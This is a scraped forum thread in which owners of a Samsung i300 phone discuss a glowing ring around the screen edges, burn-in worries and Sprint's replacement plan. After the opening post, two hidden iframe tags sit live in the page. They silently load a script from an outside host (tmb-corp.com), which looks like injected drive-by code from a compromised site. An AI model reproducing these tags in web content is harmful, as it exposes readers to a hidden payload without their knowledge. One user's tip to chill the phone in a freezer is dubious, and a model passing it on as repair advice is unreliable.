+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Exclamation Large Border Glow on Screen

Umm.. today I noticed a large white glow around the edges of my screen. Its not on the very edge, its about a quarter of an inch away from the edge with rounded corners. It dips down in the middle on the top, so it looks like there are "ears" on top.
    I think i remember reading a comment that somthing like this happens to the phone when the screen is against your leg in your pocket (because of the heat).
    But its been on there most of the day... and it has been sitting in the cradle.

Anyone know what this is and how to fix it?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Is it at all similar to the common screen blemishes discussed in the "contrast" sticky thread?

mmm.. i dont think so. Mine is a white glow like this:
    (Red is where the glow is, the top and bottom is brighter than the sides)

Its more visible with the contrast up.. but it effects images with darker colors even on lower contrast settings.

Administrator

Arrow

stick it in the freezer for a few minutes to stiffen the srystal up.. take it out and loook at it again...

I say take it in. Definately sounds like a display malfunction to me. There aren't any settings that could fix this on your handset. What setting did you have your contrast set on initially? I keep mine very high.

TechVW:

I have the same exact problem! noticed it for about a month now, and it is always persistent. i can live with it, but it's definately noticable. i keep my contrast setting just inbetween the "t" and "r",

My contrast was initially set in the middle... which is where i keep it. If i make it darker, then the glow and streaking shows up. Lighter and its hard to see the glow, but everything looks really washed out.

The center of my screen (in the red circle above) is brighter than on the edges of the screen.

The glow is more noticable on colors like blue. Like a dark blue bar that runs the length of the screen isnt solid color the whole length. Its blue then faded out blue and back to blue.

You can see the glow clearly when you tilt the phone down (top towards you).

I can still run all my apps and read text just fine.. but its so annoying.

Is this somthing I can take into a Sprint store and get it replaced? (I do not have the replacement plan)

Tech,

I would definitely take it into a Sprint store. I think they would replace it, and you certainly have nothing to lose....

HTH

Craig
    I thought grafitti was illegal?

...and you should get the replacement plan.

This is a prime example of why you need the repacement plan. What if they decided to be asses today. They could, technically, not switch it out for you, in that its a warranty issue with Samsung. And say you enroll in the program after the fact, they could not cooperate, in that they could document the problem and claim you weren't covered at the time. The $4/month is how many cents a day for that "ease of mind." Its worth it.

Taking your chances dealing with Samsung for a warranted replacement might not be too time effective.

widow's son
    Just weighing in on this issue --

I have the exact same discoloration issue, as mentioned in the handy graphic on someone's earlier post. My i300 is less than a month out of the box and this is already in place permanently. I'm a little wary of putting it in the freezer for an hour, but may try it before returning the thing.

Also I'll note that I don't have Sprint's replacement plan but at $4 a month it's certainly reasonable. I bought an extended warranty from Best Buy when I bought my phone originally ( a Nokia 6185) and have sense traded phones in for better models every 6-12 months, paying the cost difference until now, since the i300 has a value of $450, I can probably trade it up for another i300 or anything yet to come. Unfortunately the limited warranty runs out in July this year, after 3 years of overuse. But Best Buy informs me I can buy another one, for less than $90. That averages out to less than the $4 Sprint plan, but not really much different... Except that I don't know that Sprint will let you switch to a better phone when one is invented or launched.

Stick with that. As I said in my post about Circuit City, I used to do that with stereos.

Administrator

Arrow

dont put the phone in the freezer for an hour!! just a few minutes...

if the screen is bothering you guys, then please take it back and get a new one.. that is not a normal thing. i would impress upon you to get the replacement plan from sprint. my scrreen has a yellowish tint but i dont have these issues on the screen as you guys do.

Screen burn in?

I've got Album to go 2.0 If I disable the sleep mode and let one or more images remain on the screen for extended periods while the unit is in the cradle will the screen burn in? Also will this prevent the charging of the batt in the unit???

I don't yet own an I300, but as far as I understand, the I300 uses an LCD display, which doesn't suffer from burn in. Only CRTs (cathode ray tubes) suffer from this (and only after very extended periods of times) due to the nature of their image projection.

As far as battery recharging, I assume there would be no problem.

TGP
    Desperately awaiting a solution to my non-PCS CDMA/PDA combo problem.

Screen burn-in

Actually, although not exactly on topic, I thought I'd mention that Plasma screens can also burn in an image if left on too long.

Nice to know before you turn that $5000 screen into a piece of garbage.

David

I think you all are missing the his idea. He wants to leave a photo on the screen in hopes of achieving a permanent wallpaper. Ain't happenin friend. People can say all they want about the screen not holding an image but the fact is that a number of the I300's have suffered from the yellow/white line around the screen. Go check out the contrast poll.

Question Yellow/White ring around screen

Since we are talking about the yellow/white ring around the screen I thought I'd ask this question.

Has anyone else noticed a yellow or white ring appearing around there screen since they have installed a photo program?

I installed Splash Photo and I now have a ring around the outside of my screen. I also have recently installed Jake's skins. Could either of these programs have anything to do with the ring?? Is anyone else having these problems? I have tried adjusting the contrast...no luck.

Thanks,
    Laurie

Administrator

Arrow

we have had a discussion on this already...

it wont have a image burn in per se, but it will shorten the life of the screen. i would not recommend it... besides, the screen will go off on its own anyway...

the battery will continue to charge but it will take longer to charge up if you are using the phone while in the charger.

also, have you tried fireviewer?

Laurie, my girlfriends I300 has the yellow outline around the screen. Sorry I can't find that thread for you. Anyway, she has photosuite running on hers and no skins. We took it to Sprint and they said they'd replace it as soon as they got some in stock.